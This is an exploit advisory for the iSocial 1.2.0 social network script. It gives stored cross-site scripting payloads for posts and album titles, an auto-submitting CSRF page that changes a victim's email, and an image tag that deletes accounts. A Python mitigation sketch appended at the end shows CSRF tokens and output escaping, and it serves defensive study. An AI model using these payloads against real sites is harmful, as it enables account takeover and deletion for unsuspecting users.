# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2
# Version: 1.2.0
# Tested on: Kali Linux

# POC 1 : Cross-Site Scripting:
1) Create your account and navigate to "write post".
2) Put this payload and click on "post" :
<script>alert(document.cookie)</script>
3) You will have an alert box in your page.

# POC 2 : Cross-Site Scripting:
1) Navigate to "Albums" and click on "create album".
2) In the title field, put this payload :
"/><script>alert(document.cookie)</script>
3) In both cases, the payload will be executed after someone opens your album or your profile.

# POC 3 : Cross-Site Request Forgery:
# iSocial - Social Network Platform 1.2.0 suffers from a CSRF vulnerability.
# An attacker can easily change a user's email or delete a user's account.

# Change email Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://Target/isocial/demo/services/actionssetting/email" method="POST">
<input type="hidden" name="em" value="lord2@gmail.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

# Result :
# html "The information has been updated"
# status "OK"
# message ""

# Delete account Exploit:
<img src="http://Target/isocial/demo/services/actionssetting/delete">
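
# Mitigation sketch for the three POCs above. This is an added example, not code from the original advisory or from iSocial: a session-bound CSRF token check that also refuses GET for state changes, and output encoding for the post body and album title.
# Assumptions: the function names, the csrf_token field name and the session id are hypothetical, and the album title is assumed to be reflected into an HTML attribute value.

```python
import hashlib
import hmac
import html
import secrets

# Assumption: per-deployment secret; generated here so the example runs offline.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token bound to the session; embedded as a hidden field in every form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_state_change(method, session_id, form):
    """Gate for state-changing endpoints such as email change or account delete."""
    # An <img> tag can only issue GET, so refusing GET stops the delete request.
    if method != "POST":
        return 405, "state change requires POST"
    # A cross-site form carries the session cookie but cannot know the token.
    supplied = form.get("csrf_token", "")  # hypothetical field name
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    return 200, "OK"


def render_album_title(title):
    """Encode for an attribute value; quote=True neutralises the '"/>' breakout."""
    return '<input type="text" name="title" value="%s" />' % html.escape(title, quote=True)


def render_post(body):
    """Encode for element content so markup is displayed as text, not parsed."""
    return "<p>%s</p>" % html.escape(body)


if __name__ == "__main__":
    sid = "constructed-session-id"      # constructed sample value
    forged = {"em": "lord2@gmail.com"}  # body of the POC form: no token field
    print(check_state_change("POST", sid, forged))
    print(check_state_change("GET", sid, {}))
    print(check_state_change("POST", sid, dict(forged, csrf_token=issue_csrf_token(sid))))
    print(render_album_title('"/><script>alert(document.cookie)</script>'))
    print(render_post("<script>alert(document.cookie)</script>"))
```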